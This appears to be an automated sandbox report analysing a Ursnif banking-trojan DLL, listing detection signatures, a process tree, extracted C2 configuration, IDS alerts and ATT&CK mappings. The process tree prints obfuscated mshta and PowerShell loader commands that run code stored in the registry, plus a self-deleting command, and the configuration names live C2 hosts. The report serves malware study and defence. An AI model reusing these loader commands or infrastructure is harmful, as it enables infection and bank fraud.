Windows
Analysis Report
zs5n5sI6N2
Overview
General Information
Detection
Ursnif
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Self deletion via cmd delete
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- loaddll32.exe (PID: 3456 cmdline: loaddll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
- cmd.exe (PID: 6012 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
- rundll32.exe (PID: 4452 cmdline: rundll32.exe "C:\Users\user\Desktop\zs5n5sI6N2.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
- control.exe (PID: 6364 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
- explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
- cmd.exe (PID: 260 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\zs5n5sI6N2.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- PING.EXE (PID: 5988 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
- RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
- cmd.exe (PID: 2960 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1759.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- WerFault.exe (PID: 3176 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 272 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- WerFault.exe (PID: 1800 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 408 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- WerFault.exe (PID: 5172 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 436 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
- mshta.exe (PID: 6732 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cwbm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cwbm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
- powershell.exe (PID: 6824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name asytsrjo -value gp; new-alias -name famnsyvweq -value iex; famnsyvweq ([System.Text.Encoding]::ASCII.GetString((asytsrjo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- csc.exe (PID: 7156 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rn2v1u0v\rn2v1u0v.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 5080 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBB61.tmp" "c:\Users\user\AppData\Local\Temp\rn2v1u0v\CSCE8729092494447E68BAFD2B3DE7C4FE.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- csc.exe (PID: 5092 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0rxpcrxp\0rxpcrxp.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
- cvtres.exe (PID: 6392 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDBAB.tmp" "c:\Users\user\AppData\Local\Temp\0rxpcrxp\CSC81748258BEC6426288BE9680C960B04E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
- cleanup
{"RSA Public Key": "2FCnIUzdNGgeELQ1eLj0bJoMz6Wyhsxr173krpubnAkBznOw2O4zXiS7ovCR4PNNsCIjegHbTvoHWqhvq9RRNZAEBtDWX6mW3yIDXSN0qA1n8qiSRebn1HxZtuyL6FY/BR1nMcmDUet9iMwvlRDxmj+VzyCObUK6W0DHCUtNCB3pyymvgBuZvmOoqHVPJIhNG61j6VPVajqzr24KUke3teaWIZiCXT2orfIpBZFefRCfYuOYhoPg/LDJjkEBPCd72OAc2ekKwF9Tcjmm1Qm9F8aB637Mj7oTJWG5gIc8figdfCIcJsfVqtjVSAcA29hI94eg/OsMoQ7GmaQR3NS4pkbIWbvv0j+obPcxvU7II18=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "37.10.71.138", "185.158.250.51"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security | ||
No Sigma rule has matched
Timestamp: | 05/25/22-11:27:05.996967 |
Source IP: | 192.168.2.4 |
Destination IP: | 13.107.42.16 |
SID: | 2033203 |
Source Port: | 49765 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/25/22-11:27:05.996967 |
Source IP: | 192.168.2.4 |
Destination IP: | 13.107.42.16 |
SID: | 2033204 |
Source Port: | 49765 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/25/22-11:27:28.182548 |
Source IP: | 192.168.2.4 |
Destination IP: | 176.10.119.68 |
SID: | 2033203 |
Source Port: | 49771 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/25/22-11:27:27.011665 |
Source IP: | 192.168.2.4 |
Destination IP: | 176.10.119.68 |
SID: | 2033204 |
Source Port: | 49771 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
AV Detection |
---|
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 3_2_01005FBB |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 3_2_05B665C2 | |
Source: | Code function: | 3_2_05B699BC | |
Source: | Code function: | 3_2_05B7BAD1 |
Source: | Code function: | 3_2_05B6FD47 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: | ||
Source: | Snort IDS: |
Source: | Process created: |
Source: | ASN Name: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | Code function: | 3_2_01001CA5 |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Key, Mouse, Clipboard, Microphone and Screen Capturing |
---|
Source: | File source: | ||
E-Banking Fraud |
---|
Source: | File source: | ||
Source: | Registry key value created / modified: |
Source: | Code function: | 3_2_01005FBB |
System Summary |
---|
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: | ||
Source: | WMI Registry write: |
Source: | Static PE information: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Key opened: | Jump to behavior |
Source: | Static PE information: |
Source: | ReversingLabs: |
Source: | Static PE information: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Key value queried: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | |||
Source: | Section loaded: | |||
Source: | Section loaded: |
Source: | Code function: | 3_2_010068BD |
Source: | Process created: |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior | ||
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 3_2_0100829B | |
Source: | Code function: | 3_2_01007EA9 | |
Source: | Code function: | 3_2_05B83DAF | |
Source: | Code function: | 3_2_05B63496 | |
Source: | Code function: | 3_2_05B838A9 | |
Source: | Code function: | 30_2_00814493 |
Source: | Static PE information: |
Source: | Code function: | 3_2_05B6EC00 |
Source: | Static PE information: | ||
Source: | Static PE information: | ||
Source: | Static PE information: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Hooking and other Techniques for Hiding and Protection |
---|
Source: | File source: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion |
---|
Source: | Process created: |
Source: | Thread sleep time: |
Source: | Last function: |
Source: | Dropped PE file which has not been started: |
Source: | Thread delayed: |
Source: | Window / User API: |
Source: | Process information queried: |
Source: | Code function: | 3_2_05B665C2 |
Source: | Code function: | 3_2_05B699BC |
Source: | Code function: | 3_2_05B7BAD1 |
Source: | Thread delayed: |
Source: | Code function: | 3_2_05B6FD47 |
Source: | Binary or memory string: |
Source: | Code function: | 3_2_05B6EC00 |
Source: | Process token adjusted: |
Source: | Process queried: |
Source: | Code function: | 3_2_05B68FEC |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Network Connect: |
Source: | Section loaded: |
Source: | Memory written: |
Source: | Memory protected: |
Source: | Memory allocated: |
Source: | Memory written: |
Source: | Thread register set: |
Source: | Thread created: |
Source: | Process created: |
Source: | Process created: |
Source: | Binary or memory string: |
Source: | Queries volume information: |
Source: | Code function: | 3_2_01003365 |
Source: | Key value queried: |
Source: | Code function: | 3_2_05B781F1 |
Source: | Code function: | 3_2_01004B89 |
Source: | Code function: | 3_2_01006D78 |
Source: | Code function: | 3_2_01003365 |
Stealing of Sensitive Information |
---|
Source: | File source: |
Remote Access Functionality |
---|
Source: | File source: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 Valid Accounts | 1 Windows Management Instrumentation | 1 Valid Accounts | 1 Valid Accounts | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 2 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact |
Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 1 File Deletion | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Email Collection | Exfiltration Over Bluetooth | 2 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 1 Command and Scripting Interpreter | Logon Script (Windows) | 813 Process Injection | 1 Masquerading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Valid Accounts | NTDS | 25 System Information Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 11 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Access Token Manipulation | LSA Secrets | 1 Query Registry | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 11 Security Software Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 813 Process Injection | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Rundll32 | Proc Filesystem | 3 Process Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | |
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | |
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Owner/User Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | ||
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | 11 Remote System Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop | ||
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Rename System Utilities | Keylogging | 1 System Network Configuration Discovery | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | Inhibit System Recovery |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
41% | ReversingLabs | Win32.Trojan.Lazy | ||
100% | Joe Sandbox ML |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1245293 | Download File |
⊘No Antivirus matches
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
4% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
0% | URL Reputation | safe | ||
100% | Avira URL Cloud | phishing | ||
100% | Avira URL Cloud | phishing | ||
100% | Avira URL Cloud | phishing | ||
0% | URL Reputation | safe |
⊘No contacted domains info
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown | |
true |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
true |
| unknown | ||
true |
| unknown | ||
false |
| low | ||
false |
| unknown | ||
true |
| unknown | ||
true |
| unknown | ||
false |
| unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
176.10.119.68 | unknown | Switzerland | 51395 | AS-SOFTPLUSCH | true |
IP |
---|
192.168.2.1 |
Joe Sandbox Version: | 34.0.0 Boulder Opal |
Analysis ID: | 633919 |
Start date and time: | 2022-05-25 11:25:19 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 14m 51s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | zs5n5sI6N2 (renamed file extension from none to dll) |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 42 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 2 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.bank.troj.evad.winDLL@29/29@0/2 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 52.182.143.212, 13.89.179.12, 13.107.42.16
- Excluded domains from analysis (whitelisted): fs.microsoft.com, config.edge.skype.com.trafficmanager.net, onedsblobprdcus17.centralus.cloudapp.azure.com, arc.msn.com, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, l-0007.l-msedge.net, config.edge.skype.com
- Execution Graph export aborted for target mshta.exe, PID 6732 because there are no executed function
- Not all processes where analyzed, report is missing behavior information
- Report size exceeded maximum capacity and may have missing behavior information.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description |
---|---|---|
11:26:44 | API Interceptor | |
11:26:57 | API Interceptor | |
11:27:42 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
176.10.119.68 | Get hash | malicious | Browse |
⊘No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-SOFTPLUSCH | Get hash | malicious | Browse |
⊘No context
⊘No context
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_2ce29cfeeebc853567a148791f146b4541ff5338_7cac0383_0c0874ee\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.7414878379061339 |
Encrypted: | false |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_34661168243cfabc5e1ee2a141f8dfa8ff2298_7cac0383_1454ac5a\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.7447297265547901 |
Encrypted: | false |
Malicious: | false |
Preview: |
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_5a7bdef4ffd6df7a7664cf7158b49db77a1e6c9_7cac0383_07688b93\Report.wer
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 65536 |
Entropy (8bit): | 0.7488102922693348 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 34890 |
Entropy (8bit): | 2.0871699584549472 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8346 |
Entropy (8bit): | 3.692217837765199 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4659 |
Entropy (8bit): | 4.4259860118465895 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 34690 |
Entropy (8bit): | 2.0271582616456114 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8334 |
Entropy (8bit): | 3.700853069434835 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4598 |
Entropy (8bit): | 4.469500510780283 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 47714 |
Entropy (8bit): | 2.2902635791349857 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8290 |
Entropy (8bit): | 3.693325525971125 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WerFault.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4558 |
Entropy (8bit): | 4.435949177836784 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 11606 |
Entropy (8bit): | 4.8910535897909355 |
Encrypted: | false |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1192 |
Entropy (8bit): | 5.325275554903011 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.225931084277001 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.590914792113435 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.320005711190707 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.084270469417881 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.9878869287849548 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.989795686656622 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1007656956481933 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.269530833890747 |
Encrypted: | false |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.615083133545037 |
Encrypted: | false |
SSDEEP: | 24:etGSy8OmU0t3lm85xWAseO4zxQ64pfUPtkZfaFVUWI+ycuZhNmakSuPNnq:6MXQ3r5xNOKQfUuJaD31ulma3yq |
MD5: | 8443C1932024BF12E88200AEEA3979A9 |
SHA1: | 4B27B0D2CF3FAF614B4620719CDB2B65354EA9D0 |
SHA-256: | 60C95F0C07FCFECF930E9A6CF6B0035506F542EF69ED81C18AABB2F8BC90CC1C |
SHA-512: | E4AF72D9E12D8620EE6A910DD0E24D3CABE7F85C6673B71150E1FB2F716E1DE0FAA45A61BEE9A4B993A00ACD27A908D00FDE959A9DCBB9648389D3C2DD18BB2D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.336764594163779 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfpEifwKaM5DqBVKVrdFAMBJTH:Akka6CpEuwKxDcVKdBJj |
MD5: | 18E084FB1E0641B906E1057F169FD512 |
SHA1: | 34E718C95372728B9E6725DA855013D621C09E1F |
SHA-256: | 80B51B15FB9DEE28E44B9EC5D4FA97C740635F4C986AFBE3F462569F25ED035E |
